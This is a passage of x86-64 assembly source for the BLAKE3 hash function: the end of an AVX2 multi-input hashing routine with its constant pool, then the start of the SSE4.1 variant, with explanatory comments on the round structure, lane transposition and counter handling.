vpor ymm4, ymm4, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x140]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x180]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x80]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x1A0]
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxor ymm15, ymm15, ymm0
vpxor ymm12, ymm12, ymm1
vpxor ymm13, ymm13, ymm2
vpxor ymm14, ymm14, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT8+rip]
vpshufb ymm15, ymm15, ymm8
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm13, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm14
vpxor ymm5, ymm5, ymm10
vpxor ymm6, ymm6, ymm11
vpxor ymm7, ymm7, ymm8
vpxor ymm4, ymm4, ymm9
vpxor ymm0, ymm0, ymm8
vpxor ymm1, ymm1, ymm9
vpxor ymm2, ymm2, ymm10
vpxor ymm3, ymm3, ymm11
vpsrld ymm8, ymm5, 7
vpslld ymm5, ymm5, 25
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 7
vpslld ymm6, ymm6, 25
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 7
vpslld ymm7, ymm7, 25
vpor ymm7, ymm7, ymm8
vpsrld ymm8, ymm4, 7
vpslld ymm4, ymm4, 25
vpor ymm4, ymm4, ymm8
vpxor ymm4, ymm4, ymm12
vpxor ymm5, ymm5, ymm13
vpxor ymm6, ymm6, ymm14
vpxor ymm7, ymm7, ymm15
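// None of the vector ops above touch RFLAGS, so the flags set by the
// block-count compare at the top of the loop are still live here: jne
// loops back to hash the next 64-byte block of each input.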
movzx eax, byte ptr [rbp+0x38]
jne 9b
mov rbx, qword ptr [rbp+0x50]
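// Transpose the 8x8 matrix of 32-bit state words from lane-sliced form
// back to row form, so each 32-byte row stored from [rbx] is one
// input's complete chaining value.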
vunpcklps ymm8, ymm0, ymm1
vunpcklps ymm9, ymm2, ymm3
vunpckhps ymm10, ymm0, ymm1
vunpcklps ymm11, ymm4, ymm5
vunpcklps ymm0, ymm6, ymm7
vshufps ymm12, ymm8, ymm9, 78
vblendps ymm1, ymm8, ymm12, 0xCC
vshufps ymm8, ymm11, ymm0, 78
vunpckhps ymm13, ymm2, ymm3
vblendps ymm2, ymm11, ymm8, 0xCC
vblendps ymm3, ymm12, ymm9, 0xCC
vperm2f128 ymm12, ymm1, ymm2, 0x20
vmovups ymmword ptr [rbx], ymm12
vunpckhps ymm14, ymm4, ymm5
vblendps ymm4, ymm8, ymm0, 0xCC
vunpckhps ymm15, ymm6, ymm7
vperm2f128 ymm7, ymm3, ymm4, 0x20
vmovups ymmword ptr [rbx+0x20], ymm7
vshufps ymm5, ymm10, ymm13, 78
vblendps ymm6, ymm5, ymm13, 0xCC
vshufps ymm13, ymm14, ymm15, 78
vblendps ymm10, ymm10, ymm5, 0xCC
vblendps ymm14, ymm14, ymm13, 0xCC
vperm2f128 ymm8, ymm10, ymm14, 0x20
vmovups ymmword ptr [rbx+0x40], ymm8
vblendps ymm15, ymm13, ymm15, 0xCC
vperm2f128 ymm13, ymm6, ymm15, 0x20
vmovups ymmword ptr [rbx+0x60], ymm13
vperm2f128 ymm9, ymm1, ymm2, 0x31
vperm2f128 ymm11, ymm3, ymm4, 0x31
vmovups ymmword ptr [rbx+0x80], ymm9
vperm2f128 ymm14, ymm10, ymm14, 0x31
vperm2f128 ymm15, ymm6, ymm15, 0x31
vmovups ymmword ptr [rbx+0xA0], ymm11
vmovups ymmword ptr [rbx+0xC0], ymm14
vmovups ymmword ptr [rbx+0xE0], ymm15
vmovdqa ymm0, ymmword ptr [rsp+0x220]
vpaddd ymm1, ymm0, ymmword ptr [rsp+0x240]
vmovdqa ymmword ptr [rsp+0x240], ymm1
vpxor ymm0, ymm0, ymmword ptr [CMP_MSB_MASK+rip]
vpxor ymm2, ymm1, ymmword ptr [CMP_MSB_MASK+rip]
vpcmpgtd ymm2, ymm0, ymm2
vmovdqa ymm0, ymmword ptr [rsp+0x260]
vpsubd ymm2, ymm0, ymm2
vmovdqa ymmword ptr [rsp+0x260], ymm2
add rdi, 64
add rbx, 256
mov qword ptr [rbp+0x50], rbx
sub rsi, 8
cmp rsi, 8
jnc 2b
test rsi, rsi
jnz 3f
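// Common exit: vzeroupper avoids AVX-to-SSE transition penalties.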
4:
vzeroupper
mov rsp, rbp
pop rbp
pop rbx
pop r12
pop r13
pop r14
pop r15
ret
.p2align 5
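// Tail dispatch: fewer than 8 inputs remain, so take them 4, then 2,
// then 1 at a time.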
3:
mov rbx, qword ptr [rbp+0x50]
mov r15, qword ptr [rsp+0x2A0]
movzx r13d, byte ptr [rbp+0x38]
movzx r12d, byte ptr [rbp+0x48]
test rsi, 0x4
je 3f
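// Four inputs remain: run two interleaved 2-lane states (ymm0-3 and
// ymm8-11), one input per 128-bit half of each register.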
vbroadcasti128 ymm0, xmmword ptr [rcx]
vbroadcasti128 ymm1, xmmword ptr [rcx+0x10]
vmovdqa ymm8, ymm0
vmovdqa ymm9, ymm1
vbroadcasti128 ymm12, xmmword ptr [rsp+0x240]
vbroadcasti128 ymm13, xmmword ptr [rsp+0x260]
vpunpckldq ymm14, ymm12, ymm13
vpunpckhdq ymm15, ymm12, ymm13
vpermq ymm14, ymm14, 0x50
vpermq ymm15, ymm15, 0x50
vbroadcasti128 ymm12, xmmword ptr [BLAKE3_BLOCK_LEN+rip]
vpblendd ymm14, ymm14, ymm12, 0x44
vpblendd ymm15, ymm15, ymm12, 0x44
vmovdqa ymmword ptr [rsp], ymm14
vmovdqa ymmword ptr [rsp+0x20], ymm15
mov r8, qword ptr [rdi]
mov r9, qword ptr [rdi+0x8]
mov r10, qword ptr [rdi+0x10]
mov r11, qword ptr [rdi+0x18]
movzx eax, byte ptr [rbp+0x40]
or eax, r13d
xor edx, edx
.p2align 5
2:
mov r14d, eax
or eax, r12d
add rdx, 64
cmp rdx, r15
cmovne eax, r14d
mov dword ptr [rsp+0x200], eax
vmovups ymm2, ymmword ptr [r8+rdx-0x40]
vinsertf128 ymm2, ymm2, xmmword ptr [r9+rdx-0x40], 0x01
vmovups ymm3, ymmword ptr [r8+rdx-0x30]
vinsertf128 ymm3, ymm3, xmmword ptr [r9+rdx-0x30], 0x01
vshufps ymm4, ymm2, ymm3, 136
vshufps ymm5, ymm2, ymm3, 221
vmovups ymm2, ymmword ptr [r8+rdx-0x20]
vinsertf128 ymm2, ymm2, xmmword ptr [r9+rdx-0x20], 0x01
vmovups ymm3, ymmword ptr [r8+rdx-0x10]
vinsertf128 ymm3, ymm3, xmmword ptr [r9+rdx-0x10], 0x01
vshufps ymm6, ymm2, ymm3, 136
vshufps ymm7, ymm2, ymm3, 221
vpshufd ymm6, ymm6, 0x93
vpshufd ymm7, ymm7, 0x93
vmovups ymm10, ymmword ptr [r10+rdx-0x40]
vinsertf128 ymm10, ymm10, xmmword ptr [r11+rdx-0x40], 0x01
vmovups ymm11, ymmword ptr [r10+rdx-0x30]
vinsertf128 ymm11, ymm11, xmmword ptr [r11+rdx-0x30], 0x01
vshufps ymm12, ymm10, ymm11, 136
vshufps ymm13, ymm10, ymm11, 221
vmovups ymm10, ymmword ptr [r10+rdx-0x20]
vinsertf128 ymm10, ymm10, xmmword ptr [r11+rdx-0x20], 0x01
vmovups ymm11, ymmword ptr [r10+rdx-0x10]
vinsertf128 ymm11, ymm11, xmmword ptr [r11+rdx-0x10], 0x01
vshufps ymm14, ymm10, ymm11, 136
vshufps ymm15, ymm10, ymm11, 221
vpshufd ymm14, ymm14, 0x93
vpshufd ymm15, ymm15, 0x93
prefetcht0 [r8+rdx+0x80]
prefetcht0 [r9+rdx+0x80]
prefetcht0 [r10+rdx+0x80]
prefetcht0 [r11+rdx+0x80]
vpbroadcastd ymm2, dword ptr [rsp+0x200]
vmovdqa ymm3, ymmword ptr [rsp]
vmovdqa ymm11, ymmword ptr [rsp+0x20]
vpblendd ymm3, ymm3, ymm2, 0x88
vpblendd ymm11, ymm11, ymm2, 0x88
vbroadcasti128 ymm2, xmmword ptr [BLAKE3_IV+rip]
vmovdqa ymm10, ymm2
mov al, 7
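// Seven BLAKE3 rounds, counted down in al. Each pass below performs the
// column and diagonal halves of the G function: 16- and 8-bit rotates
// via the ROT16/ROT8 pshufb tables, 12- and 7-bit rotates via shift/or
// pairs, and pshufd 0x93/0x4E/0x39 to (un)diagonalize the state.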
9:
vpaddd ymm0, ymm0, ymm4
vpaddd ymm8, ymm8, ymm12
vmovdqa ymmword ptr [rsp+0x40], ymm4
nop
vmovdqa ymmword ptr [rsp+0x60], ymm12
nop
vpaddd ymm0, ymm0, ymm1
vpaddd ymm8, ymm8, ymm9
vpxor ymm3, ymm3, ymm0
vpxor ymm11, ymm11, ymm8
vbroadcasti128 ymm4, xmmword ptr [ROT16+rip]
vpshufb ymm3, ymm3, ymm4
vpshufb ymm11, ymm11, ymm4
vpaddd ymm2, ymm2, ymm3
vpaddd ymm10, ymm10, ymm11
vpxor ymm1, ymm1, ymm2
vpxor ymm9, ymm9, ymm10
vpsrld ymm4, ymm1, 12
vpslld ymm1, ymm1, 20
vpor ymm1, ymm1, ymm4
vpsrld ymm4, ymm9, 12
vpslld ymm9, ymm9, 20
vpor ymm9, ymm9, ymm4
vpaddd ymm0, ymm0, ymm5
vpaddd ymm8, ymm8, ymm13
vpaddd ymm0, ymm0, ymm1
vpaddd ymm8, ymm8, ymm9
vmovdqa ymmword ptr [rsp+0x80], ymm5
vmovdqa ymmword ptr [rsp+0xA0], ymm13
vpxor ymm3, ymm3, ymm0
vpxor ymm11, ymm11, ymm8
vbroadcasti128 ymm4, xmmword ptr [ROT8+rip]
vpshufb ymm3, ymm3, ymm4
vpshufb ymm11, ymm11, ymm4
vpaddd ymm2, ymm2, ymm3
vpaddd ymm10, ymm10, ymm11
vpxor ymm1, ymm1, ymm2
vpxor ymm9, ymm9, ymm10
vpsrld ymm4, ymm1, 7
vpslld ymm1, ymm1, 25
vpor ymm1, ymm1, ymm4
vpsrld ymm4, ymm9, 7
vpslld ymm9, ymm9, 25
vpor ymm9, ymm9, ymm4
vpshufd ymm0, ymm0, 0x93
vpshufd ymm8, ymm8, 0x93
vpshufd ymm3, ymm3, 0x4E
vpshufd ymm11, ymm11, 0x4E
vpshufd ymm2, ymm2, 0x39
vpshufd ymm10, ymm10, 0x39
vpaddd ymm0, ymm0, ymm6
vpaddd ymm8, ymm8, ymm14
vpaddd ymm0, ymm0, ymm1
vpaddd ymm8, ymm8, ymm9
vpxor ymm3, ymm3, ymm0
vpxor ymm11, ymm11, ymm8
vbroadcasti128 ymm4, xmmword ptr [ROT16+rip]
vpshufb ymm3, ymm3, ymm4
vpshufb ymm11, ymm11, ymm4
vpaddd ymm2, ymm2, ymm3
vpaddd ymm10, ymm10, ymm11
vpxor ymm1, ymm1, ymm2
vpxor ymm9, ymm9, ymm10
vpsrld ymm4, ymm1, 12
vpslld ymm1, ymm1, 20
vpor ymm1, ymm1, ymm4
vpsrld ymm4, ymm9, 12
vpslld ymm9, ymm9, 20
vpor ymm9, ymm9, ymm4
vpaddd ymm0, ymm0, ymm7
vpaddd ymm8, ymm8, ymm15
vpaddd ymm0, ymm0, ymm1
vpaddd ymm8, ymm8, ymm9
vpxor ymm3, ymm3, ymm0
vpxor ymm11, ymm11, ymm8
vbroadcasti128 ymm4, xmmword ptr [ROT8+rip]
vpshufb ymm3, ymm3, ymm4
vpshufb ymm11, ymm11, ymm4
vpaddd ymm2, ymm2, ymm3
vpaddd ymm10, ymm10, ymm11
vpxor ymm1, ymm1, ymm2
vpxor ymm9, ymm9, ymm10
vpsrld ymm4, ymm1, 7
vpslld ymm1, ymm1, 25
vpor ymm1, ymm1, ymm4
vpsrld ymm4, ymm9, 7
vpslld ymm9, ymm9, 25
vpor ymm9, ymm9, ymm4
vpshufd ymm0, ymm0, 0x39
vpshufd ymm8, ymm8, 0x39
vpshufd ymm3, ymm3, 0x4E
vpshufd ymm11, ymm11, 0x4E
vpshufd ymm2, ymm2, 0x93
vpshufd ymm10, ymm10, 0x93
dec al
je 9f
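// Not the final round: apply BLAKE3's fixed message permutation
// 2,6,3,10,7,0,4,13,1,11,12,5,9,14,15,8 to the message word vectors.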
vmovdqa ymm4, ymmword ptr [rsp+0x40]
vmovdqa ymm5, ymmword ptr [rsp+0x80]
vshufps ymm12, ymm4, ymm5, 214
vpshufd ymm13, ymm4, 0x0F
vpshufd ymm4, ymm12, 0x39
vshufps ymm12, ymm6, ymm7, 250
vpblendd ymm13, ymm13, ymm12, 0xAA
vpunpcklqdq ymm12, ymm7, ymm5
vpblendd ymm12, ymm12, ymm6, 0x88
vpshufd ymm12, ymm12, 0x78
vpunpckhdq ymm5, ymm5, ymm7
vpunpckldq ymm6, ymm6, ymm5
vpshufd ymm7, ymm6, 0x1E
vmovdqa ymmword ptr [rsp+0x40], ymm13
vmovdqa ymmword ptr [rsp+0x80], ymm12
vmovdqa ymm12, ymmword ptr [rsp+0x60]
vmovdqa ymm13, ymmword ptr [rsp+0xA0]
vshufps ymm5, ymm12, ymm13, 214
vpshufd ymm6, ymm12, 0x0F
vpshufd ymm12, ymm5, 0x39
vshufps ymm5, ymm14, ymm15, 250
vpblendd ymm6, ymm6, ymm5, 0xAA
vpunpcklqdq ymm5, ymm15, ymm13
vpblendd ymm5, ymm5, ymm14, 0x88
vpshufd ymm5, ymm5, 0x78
vpunpckhdq ymm13, ymm13, ymm15
vpunpckldq ymm14, ymm14, ymm13
vpshufd ymm15, ymm14, 0x1E
vmovdqa ymm13, ymm6
vmovdqa ymm14, ymm5
vmovdqa ymm5, ymmword ptr [rsp+0x40]
vmovdqa ymm6, ymmword ptr [rsp+0x80]
jmp 9b
9:
vpxor ymm0, ymm0, ymm2
vpxor ymm1, ymm1, ymm3
vpxor ymm8, ymm8, ymm10
vpxor ymm9, ymm9, ymm11
mov eax, r13d
cmp rdx, r15
jne 2b
vmovdqu xmmword ptr [rbx], xmm0
vmovdqu xmmword ptr [rbx+0x10], xmm1
vextracti128 xmmword ptr [rbx+0x20], ymm0, 0x01
vextracti128 xmmword ptr [rbx+0x30], ymm1, 0x01
vmovdqu xmmword ptr [rbx+0x40], xmm8
vmovdqu xmmword ptr [rbx+0x50], xmm9
vextracti128 xmmword ptr [rbx+0x60], ymm8, 0x01
vextracti128 xmmword ptr [rbx+0x70], ymm9, 0x01
vmovaps xmm8, xmmword ptr [rsp+0x280]
vmovaps xmm0, xmmword ptr [rsp+0x240]
vmovaps xmm1, xmmword ptr [rsp+0x250]
vmovaps xmm2, xmmword ptr [rsp+0x260]
vmovaps xmm3, xmmword ptr [rsp+0x270]
vblendvps xmm0, xmm0, xmm1, xmm8
vblendvps xmm2, xmm2, xmm3, xmm8
vmovaps xmmword ptr [rsp+0x240], xmm0
vmovaps xmmword ptr [rsp+0x260], xmm2
add rbx, 128
add rdi, 32
sub rsi, 4
3:
test rsi, 0x2
je 3f
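// Two inputs remain: one state per 128-bit half of each ymm register.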
vbroadcasti128 ymm0, xmmword ptr [rcx]
vbroadcasti128 ymm1, xmmword ptr [rcx+0x10]
vmovd xmm13, dword ptr [rsp+0x240]
vpinsrd xmm13, xmm13, dword ptr [rsp+0x260], 1
vpinsrd xmm13, xmm13, dword ptr [BLAKE3_BLOCK_LEN+rip], 2
vmovd xmm14, dword ptr [rsp+0x244]
vpinsrd xmm14, xmm14, dword ptr [rsp+0x264], 1
vpinsrd xmm14, xmm14, dword ptr [BLAKE3_BLOCK_LEN+rip], 2
vinserti128 ymm13, ymm13, xmm14, 0x01
vbroadcasti128 ymm14, xmmword ptr [ROT16+rip]
vbroadcasti128 ymm15, xmmword ptr [ROT8+rip]
mov r8, qword ptr [rdi]
mov r9, qword ptr [rdi+0x8]
movzx eax, byte ptr [rbp+0x40]
or eax, r13d
xor edx, edx
.p2align 5
2:
mov r14d, eax
or eax, r12d
add rdx, 64
cmp rdx, r15
cmovne eax, r14d
mov dword ptr [rsp+0x200], eax
vbroadcasti128 ymm2, xmmword ptr [BLAKE3_IV+rip]
vpbroadcastd ymm8, dword ptr [rsp+0x200]
vpblendd ymm3, ymm13, ymm8, 0x88
vmovups ymm8, ymmword ptr [r8+rdx-0x40]
vinsertf128 ymm8, ymm8, xmmword ptr [r9+rdx-0x40], 0x01
vmovups ymm9, ymmword ptr [r8+rdx-0x30]
vinsertf128 ymm9, ymm9, xmmword ptr [r9+rdx-0x30], 0x01
vshufps ymm4, ymm8, ymm9, 136
vshufps ymm5, ymm8, ymm9, 221
vmovups ymm8, ymmword ptr [r8+rdx-0x20]
vinsertf128 ymm8, ymm8, xmmword ptr [r9+rdx-0x20], 0x01
vmovups ymm9, ymmword ptr [r8+rdx-0x10]
vinsertf128 ymm9, ymm9, xmmword ptr [r9+rdx-0x10], 0x01
vshufps ymm6, ymm8, ymm9, 136
vshufps ymm7, ymm8, ymm9, 221
vpshufd ymm6, ymm6, 0x93
vpshufd ymm7, ymm7, 0x93
mov al, 7
9:
vpaddd ymm0, ymm0, ymm4
vpaddd ymm0, ymm0, ymm1
vpxor ymm3, ymm3, ymm0
vpshufb ymm3, ymm3, ymm14
vpaddd ymm2, ymm2, ymm3
vpxor ymm1, ymm1, ymm2
vpsrld ymm8, ymm1, 12
vpslld ymm1, ymm1, 20
vpor ymm1, ymm1, ymm8
vpaddd ymm0, ymm0, ymm5
vpaddd ymm0, ymm0, ymm1
vpxor ymm3, ymm3, ymm0
vpshufb ymm3, ymm3, ymm15
vpaddd ymm2, ymm2, ymm3
vpxor ymm1, ymm1, ymm2
vpsrld ymm8, ymm1, 7
vpslld ymm1, ymm1, 25
vpor ymm1, ymm1, ymm8
vpshufd ymm0, ymm0, 0x93
vpshufd ymm3, ymm3, 0x4E
vpshufd ymm2, ymm2, 0x39
vpaddd ymm0, ymm0, ymm6
vpaddd ymm0, ymm0, ymm1
vpxor ymm3, ymm3, ymm0
vpshufb ymm3, ymm3, ymm14
vpaddd ymm2, ymm2, ymm3
vpxor ymm1, ymm1, ymm2
vpsrld ymm8, ymm1, 12
vpslld ymm1, ymm1, 20
vpor ymm1, ymm1, ymm8
vpaddd ymm0, ymm0, ymm7
vpaddd ymm0, ymm0, ymm1
vpxor ymm3, ymm3, ymm0
vpshufb ymm3, ymm3, ymm15
vpaddd ymm2, ymm2, ymm3
vpxor ymm1, ymm1, ymm2
vpsrld ymm8, ymm1, 7
vpslld ymm1, ymm1, 25
vpor ymm1, ymm1, ymm8
vpshufd ymm0, ymm0, 0x39
vpshufd ymm3, ymm3, 0x4E
vpshufd ymm2, ymm2, 0x93
dec al
jz 9f
vshufps ymm8, ymm4, ymm5, 214
vpshufd ymm9, ymm4, 0x0F
vpshufd ymm4, ymm8, 0x39
vshufps ymm8, ymm6, ymm7, 250
vpblendd ymm9, ymm9, ymm8, 0xAA
vpunpcklqdq ymm8, ymm7, ymm5
vpblendd ymm8, ymm8, ymm6, 0x88
vpshufd ymm8, ymm8, 0x78
vpunpckhdq ymm5, ymm5, ymm7
vpunpckldq ymm6, ymm6, ymm5
vpshufd ymm7, ymm6, 0x1E
vmovdqa ymm5, ymm9
vmovdqa ymm6, ymm8
jmp 9b
9:
vpxor ymm0, ymm0, ymm2
vpxor ymm1, ymm1, ymm3
mov eax, r13d
cmp rdx, r15
jne 2b
vmovdqu xmmword ptr [rbx], xmm0
vmovdqu xmmword ptr [rbx+0x10], xmm1
vextracti128 xmmword ptr [rbx+0x20], ymm0, 0x01
vextracti128 xmmword ptr [rbx+0x30], ymm1, 0x01
vmovaps ymm8, ymmword ptr [rsp+0x280]
vmovaps ymm0, ymmword ptr [rsp+0x240]
vmovups ymm1, ymmword ptr [rsp+0x248]
vmovaps ymm2, ymmword ptr [rsp+0x260]
vmovups ymm3, ymmword ptr [rsp+0x268]
vblendvps ymm0, ymm0, ymm1, ymm8
vblendvps ymm2, ymm2, ymm3, ymm8
vmovaps ymmword ptr [rsp+0x240], ymm0
vmovaps ymmword ptr [rsp+0x260], ymm2
add rbx, 64
add rdi, 16
sub rsi, 2
3:
test rsi, 0x1
je 4b
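// One input remains: a plain single-lane 128-bit compression loop.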
vmovdqu xmm0, xmmword ptr [rcx]
vmovdqu xmm1, xmmword ptr [rcx+0x10]
vmovd xmm3, dword ptr [rsp+0x240]
vpinsrd xmm3, xmm3, dword ptr [rsp+0x260], 1
vpinsrd xmm13, xmm3, dword ptr [BLAKE3_BLOCK_LEN+rip], 2
vmovdqa xmm14, xmmword ptr [ROT16+rip]
vmovdqa xmm15, xmmword ptr [ROT8+rip]
mov r8, qword ptr [rdi]
movzx eax, byte ptr [rbp+0x40]
or eax, r13d
xor edx, edx
.p2align 5
2:
mov r14d, eax
or eax, r12d
add rdx, 64
cmp rdx, r15
cmovne eax, r14d
vmovdqa xmm2, xmmword ptr [BLAKE3_IV+rip]
vmovdqa xmm3, xmm13
vpinsrd xmm3, xmm3, eax, 3
vmovups xmm8, xmmword ptr [r8+rdx-0x40]
vmovups xmm9, xmmword ptr [r8+rdx-0x30]
vshufps xmm4, xmm8, xmm9, 136
vshufps xmm5, xmm8, xmm9, 221
vmovups xmm8, xmmword ptr [r8+rdx-0x20]
vmovups xmm9, xmmword ptr [r8+rdx-0x10]
vshufps xmm6, xmm8, xmm9, 136
vshufps xmm7, xmm8, xmm9, 221
vpshufd xmm6, xmm6, 0x93
vpshufd xmm7, xmm7, 0x93
mov al, 7
9:
vpaddd xmm0, xmm0, xmm4
vpaddd xmm0, xmm0, xmm1
vpxor xmm3, xmm3, xmm0
vpshufb xmm3, xmm3, xmm14
vpaddd xmm2, xmm2, xmm3
vpxor xmm1, xmm1, xmm2
vpsrld xmm8, xmm1, 12
vpslld xmm1, xmm1, 20
vpor xmm1, xmm1, xmm8
vpaddd xmm0, xmm0, xmm5
vpaddd xmm0, xmm0, xmm1
vpxor xmm3, xmm3, xmm0
vpshufb xmm3, xmm3, xmm15
vpaddd xmm2, xmm2, xmm3
vpxor xmm1, xmm1, xmm2
vpsrld xmm8, xmm1, 7
vpslld xmm1, xmm1, 25
vpor xmm1, xmm1, xmm8
vpshufd xmm0, xmm0, 0x93
vpshufd xmm3, xmm3, 0x4E
vpshufd xmm2, xmm2, 0x39
vpaddd xmm0, xmm0, xmm6
vpaddd xmm0, xmm0, xmm1
vpxor xmm3, xmm3, xmm0
vpshufb xmm3, xmm3, xmm14
vpaddd xmm2, xmm2, xmm3
vpxor xmm1, xmm1, xmm2
vpsrld xmm8, xmm1, 12
vpslld xmm1, xmm1, 20
vpor xmm1, xmm1, xmm8
vpaddd xmm0, xmm0, xmm7
vpaddd xmm0, xmm0, xmm1
vpxor xmm3, xmm3, xmm0
vpshufb xmm3, xmm3, xmm15
vpaddd xmm2, xmm2, xmm3
vpxor xmm1, xmm1, xmm2
vpsrld xmm8, xmm1, 7
vpslld xmm1, xmm1, 25
vpor xmm1, xmm1, xmm8
vpshufd xmm0, xmm0, 0x39
vpshufd xmm3, xmm3, 0x4E
vpshufd xmm2, xmm2, 0x93
dec al
jz 9f
vshufps xmm8, xmm4, xmm5, 214
vpshufd xmm9, xmm4, 0x0F
vpshufd xmm4, xmm8, 0x39
vshufps xmm8, xmm6, xmm7, 250
vpblendd xmm9, xmm9, xmm8, 0xAA
vpunpcklqdq xmm8, xmm7, xmm5
vpblendd xmm8, xmm8, xmm6, 0x88
vpshufd xmm8, xmm8, 0x78
vpunpckhdq xmm5, xmm5, xmm7
vpunpckldq xmm6, xmm6, xmm5
vpshufd xmm7, xmm6, 0x1E
vmovdqa xmm5, xmm9
vmovdqa xmm6, xmm8
jmp 9b
9:
vpxor xmm0, xmm0, xmm2
vpxor xmm1, xmm1, xmm3
mov eax, r13d
cmp rdx, r15
jne 2b
vmovdqu xmmword ptr [rbx], xmm0
vmovdqu xmmword ptr [rbx+0x10], xmm1
jmp 4b
#ifdef __APPLE__
.static_data
#else
.section .rodata
#endif
.p2align 6
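// Constant pool: ADD0/ADD1 are the per-lane counter offsets and the
// per-iteration stride; BLAKE3_IV_* broadcast the IV words; ROT16/ROT8
// are pshufb masks that rotate each dword right by 16 and 8 bits; and
// CMP_MSB_MASK flips sign bits so a signed compare acts as unsigned.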
ADD0:
.long 0, 1, 2, 3, 4, 5, 6, 7
ADD1:
.long 8, 8, 8, 8, 8, 8, 8, 8
BLAKE3_IV_0:
.long 0x6A09E667, 0x6A09E667, 0x6A09E667, 0x6A09E667
.long 0x6A09E667, 0x6A09E667, 0x6A09E667, 0x6A09E667
BLAKE3_IV_1:
.long 0xBB67AE85, 0xBB67AE85, 0xBB67AE85, 0xBB67AE85
.long 0xBB67AE85, 0xBB67AE85, 0xBB67AE85, 0xBB67AE85
BLAKE3_IV_2:
.long 0x3C6EF372, 0x3C6EF372, 0x3C6EF372, 0x3C6EF372
.long 0x3C6EF372, 0x3C6EF372, 0x3C6EF372, 0x3C6EF372
BLAKE3_IV_3:
.long 0xA54FF53A, 0xA54FF53A, 0xA54FF53A, 0xA54FF53A
.long 0xA54FF53A, 0xA54FF53A, 0xA54FF53A, 0xA54FF53A
BLAKE3_BLOCK_LEN:
.long 0x00000040, 0x00000040, 0x00000040, 0x00000040
.long 0x00000040, 0x00000040, 0x00000040, 0x00000040
ROT16:
.byte 2, 3, 0, 1, 6, 7, 4, 5, 10, 11, 8, 9, 14, 15, 12, 13
ROT8:
.byte 1, 2, 3, 0, 5, 6, 7, 4, 9, 10, 11, 8, 13, 14, 15, 12
CMP_MSB_MASK:
.long 0x80000000, 0x80000000, 0x80000000, 0x80000000
.long 0x80000000, 0x80000000, 0x80000000, 0x80000000
BLAKE3_IV:
.long 0x6A09E667, 0xBB67AE85, 0x3C6EF372, 0xA54FF53A
|
mit-enclaves/argos-monitor | 61,143 | C/libraries/sdktyche/loader/blake3_sse41_x86-64_unix.S | #if defined(__ELF__) && defined(__linux__)
.section .note.GNU-stack,"",%progbits
#endif
#if defined(__ELF__) && defined(__CET__) && defined(__has_include)
#if __has_include(<cet.h>)
#include <cet.h>
#endif
#endif
#if !defined(_CET_ENDBR)
#define _CET_ENDBR
#endif
.intel_syntax noprefix
.global blake3_hash_many_sse41
.global _blake3_hash_many_sse41
.global blake3_compress_in_place_sse41
.global _blake3_compress_in_place_sse41
.global blake3_compress_xof_sse41
.global _blake3_compress_xof_sse41
#ifdef __APPLE__
.text
#else
.section .text
#endif
.p2align 6
_blake3_hash_many_sse41:
blake3_hash_many_sse41:
_CET_ENDBR
push r15
push r14
push r13
push r12
push rbx
push rbp
mov rbp, rsp
sub rsp, 360
and rsp, 0xFFFFFFFFFFFFFFC0
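// Negating the increment_counter argument (r9d) yields an all-ones or
// all-zero mask that gates the lane offsets (ADD0) and stride (ADD1).
// The low counter words land at [rsp+0x110], and the high words at
// [rsp+0x120] after absorbing the carry from the lane offsets.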
neg r9d
movd xmm0, r9d
pshufd xmm0, xmm0, 0x00
movdqa xmmword ptr [rsp+0x130], xmm0
movdqa xmm1, xmm0
pand xmm1, xmmword ptr [ADD0+rip]
pand xmm0, xmmword ptr [ADD1+rip]
movdqa xmmword ptr [rsp+0x150], xmm0
movd xmm0, r8d
pshufd xmm0, xmm0, 0x00
paddd xmm0, xmm1
movdqa xmmword ptr [rsp+0x110], xmm0
pxor xmm0, xmmword ptr [CMP_MSB_MASK+rip]
pxor xmm1, xmmword ptr [CMP_MSB_MASK+rip]
pcmpgtd xmm1, xmm0
shr r8, 32
movd xmm2, r8d
pshufd xmm2, xmm2, 0x00
psubd xmm2, xmm1
movdqa xmmword ptr [rsp+0x120], xmm2
mov rbx, qword ptr [rbp+0x50]
mov r15, rdx
shl r15, 6
movzx r13d, byte ptr [rbp+0x38]
movzx r12d, byte ptr [rbp+0x48]
cmp rsi, 4
jc 3f
2:
movdqu xmm3, xmmword ptr [rcx]
pshufd xmm0, xmm3, 0x00
pshufd xmm1, xmm3, 0x55
pshufd xmm2, xmm3, 0xAA
pshufd xmm3, xmm3, 0xFF
movdqu xmm7, xmmword ptr [rcx+0x10]
pshufd xmm4, xmm7, 0x00
pshufd xmm5, xmm7, 0x55
pshufd xmm6, xmm7, 0xAA
pshufd xmm7, xmm7, 0xFF
mov r8, qword ptr [rdi]
mov r9, qword ptr [rdi+0x8]
mov r10, qword ptr [rdi+0x10]
mov r11, qword ptr [rdi+0x18]
movzx eax, byte ptr [rbp+0x40]
or eax, r13d
xor edx, edx
9:
mov r14d, eax
or eax, r12d
add rdx, 64
cmp rdx, r15
cmovne eax, r14d
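// Load one 64-byte block from each of the four inputs and transpose the
// 4x4 dword tiles so every xmm spilled to [rsp..rsp+0xF0] holds one
// message word across all four lanes.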
movdqu xmm8, xmmword ptr [r8+rdx-0x40]
movdqu xmm9, xmmword ptr [r9+rdx-0x40]
movdqu xmm10, xmmword ptr [r10+rdx-0x40]
movdqu xmm11, xmmword ptr [r11+rdx-0x40]
movdqa xmm12, xmm8
punpckldq xmm8, xmm9
punpckhdq xmm12, xmm9
movdqa xmm14, xmm10
punpckldq xmm10, xmm11
punpckhdq xmm14, xmm11
movdqa xmm9, xmm8
punpcklqdq xmm8, xmm10
punpckhqdq xmm9, xmm10
movdqa xmm13, xmm12
punpcklqdq xmm12, xmm14
punpckhqdq xmm13, xmm14
movdqa xmmword ptr [rsp], xmm8
movdqa xmmword ptr [rsp+0x10], xmm9
movdqa xmmword ptr [rsp+0x20], xmm12
movdqa xmmword ptr [rsp+0x30], xmm13
